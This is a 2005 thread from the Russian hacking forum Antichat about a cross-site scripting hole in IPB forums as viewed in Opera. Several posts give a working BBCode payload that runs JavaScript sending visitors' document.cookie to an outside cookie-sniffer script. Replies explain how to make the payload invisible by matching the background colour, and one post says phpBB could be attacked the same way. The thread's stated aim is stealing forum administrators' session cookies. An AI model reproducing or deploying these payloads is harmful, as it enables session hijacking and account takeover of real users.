Форум АНТИЧАТ - XSS в форуме IPB, на примере браузера Опера

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - XSS в форуме IPB, на примере браузера Опера (https://forum.antichat.xyz/showthread.php?t=4740)

Fr13nd

13.01.2005 11:16

XSS в форуме IPB, на примере браузера Опера

Код:

[COLOR=http://aaa.aa/=`aaa.jpg]` style=background:url(javascript:document.images[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR]

послал админам в личку, потом был забанен....
потом доперло , что у админов опера,
так он и есть

отображение хсс в опере

Код:

'>` style=background:url(javascript:document.images[1].src="sniff?"+document.cookie)

как сделать чтоб хотябы код не было видно ?

>>ElvI$<<

13.01.2005 12:19

Внимательней читай коменты...

Цитата:

Егорыч++++

Совет. Поскольку, уязвимость не работает в других браузерах, то в Опере или Firefox видится всякая абракадабра. Этим можно выдать себя. Для того , чтоб себя не выдать можно покрасить сообщение под цвет фона.

[COLOR=http://aaa.aa/=`aaa.jpg]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR]

Примерно так...

>>ElvI$<<

13.01.2005 12:20

ой 8) не корректно отобразилось...

[COLOR=цвет фона][COLOR=http://aaa.aa/=`aaa.jpg]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR][/COLOR]

Вот и все...я уже давно допер,как их скрыть!

Algol

13.01.2005 14:39

Кстати, если хорошо подумать, то эту уязвимость можно адаптировать и под оперу...Без использования обратной кавычки

>>ElvI$<<

13.01.2005 19:15

да 8) А еще если хорошо подумать мона и Phpbb 2.0.11 через Xss ломануть 8)

Время: 09:33